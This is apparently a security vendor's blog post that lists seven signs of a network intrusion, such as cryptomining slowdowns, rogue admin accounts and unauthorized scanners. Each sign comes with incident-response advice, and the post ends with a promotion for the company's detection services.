Seven (7) signs that your network has been hacked
7 signs that your network has been hacked
There are telltale signs that let you know you’ve been hacked. During any cyberattack, whether it's classic intrusions, data exfiltration, or ransomware, hackers leave their tracks in your network. And if you actively monitor your network security, you should be able to identify the signs quickly and minimize the impact of the cyberattack.
If you don't monitor your network security, the hacker will have plenty of time to snoop around, and identify all the most promising systems to target before taking action. According to an IBM report on security breaches, in 2021 organizations took an average of 212 days to discover they’d been hacked! That’s a 212-day head start for the bad guys
Here are 6 clear signs that your network has been hacked. Keep a close eye on them and react quickly if you identify them.
- Your servers suddenly slow down for no reason
Sudden and unexplained slowness of your servers is often a sign that you’ve been hacked for cryptocurrency mining. Three (3) scenarios are very often exploited to hack your servers for cryptocurrency mining:
- The malicious file is introduced into your network via a phishing attack
- The hacker finds a vulnerability on your server and exploits it to take control. The hacker then runs his malicious crypto-currency mining tool
- The hacker exploits a vulnerability that allows him to drop and execute his malicious tool directly on your server without taking control of it
What to do: when you experience unexplained slowness on your servers, search the security events (logs) generated by the affected servers. Look for Powershell script executions that connect to remote websites to download other files. If you find any, you have confirmation of a hacking. Also, consider that crypto-currency mining is only one step in an attack. The hacker's ultimate goal may be to introduce ransomware into your network. If you find this, it’s time to trigger your incident response plan.
- You find suspicious files on your servers or workstations
It won’t come as a surprise that it's never a good sign to find suspicious files on your servers or workstations. In most cases, it is a sign that you have been hacked and that the hacker is in your network.
What to do: Never ignore suspicious or unknown files! Disconnect all machines on which suspicious files have been found. Then analyze these files to determine whether they are malicious or not. Online tools such as VirusTotal, Tri.age, or Any.run allow you to check if a file is malicious. The rule here is to never try to tinker. If you don't have the in-house expertise, get outside help. Specialized incident response companies such as Streamscan can help us analyze files to get to the bottom of it. If needed, they will also help you manage the incident from start to finish, to limit the impact.
Your antivirus or EDR detects and blocks multiple suspicious/malicious files in a short period of time
No matter how effective your antivirus or EDR is, the fact that it detects and blocks multiple malicious files in your network in a short period of time (e.g. 1 week or 1 month) is unusual and never reassuring. Whenever you have a spike in the detection of malicious tools in your network, you must act and above all not let your guard down. Chances are that a hacker is already in your network and trying to introduce malicious tools. Some of these tools will be blocked by your antivirus/EDR software, but others will not. It only takes one malicious tool to go undetected by your antivirus/EDR to set things in motion.
What to do: if you observe this kind of unusual event, analyze the files blocked by the antivirus/EDR. Are they port scanning or vulnerability scanning tools? Are they remote control tools? Are they password cracking tools? We also strongly recommend that you analyze the security logs on all machines where suspicious files have been detected and blocked to see if there has been any suspicious access.
You discover a suspicious user account created in your network
The discovery of a suspicious user account or one that does not respect your nomenclature of user names is very often an indication that your network has been compromised. If it turns out that this dubious account has administrator privileges, it’s urgent to act because the hacker is most certainly in your network.
What to do: keep a cool head and check to confirm if the account was created by someone on your team. If not, trigger your incident response process. If you don't have the internal expertise to handle the incident, seek external help. And do it fast. Every second of malicious access multiplies your risk.
Don't delete the suspicious account you've detected, the hacker will realize that you've spotted it and will speed up the rate of attack, which will cause more damage. Note that hackers like to have several strings to their bow. Usually, they are not satisfied with having only one access in your network, so just because you’ve found one access point and closed it doesn’t mean you’ve gotten rid of your hacker.
You Discover a remote access control tool installed without your knowledge
Hackers like to keep control over the machines they hack because it gives them the opportunity to plan and execute their malicious actions without putting pressure on themselves. For this, one of their first reflexes is to install a remote system control or administration tool on their victims. The discovery of such a tool installed without authorization in your computer park is a red flag. You must act quickly.
What to do: take the time to confirm whether the tool was installed by a member of your IT staff (if it’s a server) or by the user (if it’s a terminal). If the installation wasn’t done by an internal person, trigger your incident response plan.
Discovery of a network scanner installed in your network without your knowledge
Once a hacker controls your network, his next step is to find interesting targets to infect. He will look first for servers that control sensitive systems (domain controllers, databases, etc.). To do this, they will use a network scanning tool that will allow them to identify machines in your network as well as the servers they host. With this information, the hacker will be able to identify the important machines and focus on them.
What to do: If you find an unauthorized network scanner installed in your IT park, immediately trigger your incident response plan.
You find traces of known attacks in the logs of a server
When a security vulnerability is highly publicized, attack programs quickly become available on the Internet. Anyone can download them, adapt them and launch attacks. Hackers will take advantage of this to set up automated attack servers that will scan the Internet 24/7 to find and exploit this vulnerability. In the end, a very large number of machines will be hacked in record time. This was the case for the PrintNightMare, Proxyshell, and Log4Shell vulnerabilities. Following this kind of media coverage, it is strongly recommended that organizations perform a vulnerability scan to identify whether they have vulnerable systems or not. If this exercise confirms that your servers are vulnerable, investigate further. If you find evidence that attempts to exploit the vulnerability have targeted a given server or servers, do not assume that they have been hacked.
What to do: Don’t take any risks, immediately disconnect the affected servers and carry out further analysis. Have suspicious computer codes been executed on your servers, for example, Powershell scripts? Was your antivirus software stopped at any time? Were any logs deleted at a given date after the vulnerability was publicized? Were there any late-night connections to the server? etc. If you have confirmation that a hack has occurred, trigger your incident response plan. If you don't have in-house expertise, seek external help. Above all, don't ignore the event.
Need help? StreamScan is here.
If you also need help defining your security incident response plan, managing a cybersecurity incident, or implementing a Managed Detection and Response (MDR) solution, contact us at securitepme@streamscan.ai or call us at 1-877-208-9040.
If you are looking for technology to protect your network, our CDS cyber threat detection technology is the best option for you. It is capable of detecting attacks upstream, at every stage (network scanning and vulnerability identification, attempted injection of attack exploits, brute force,
and similar attacks, lateral movement, persistence, etc.), blocking them and alerting you.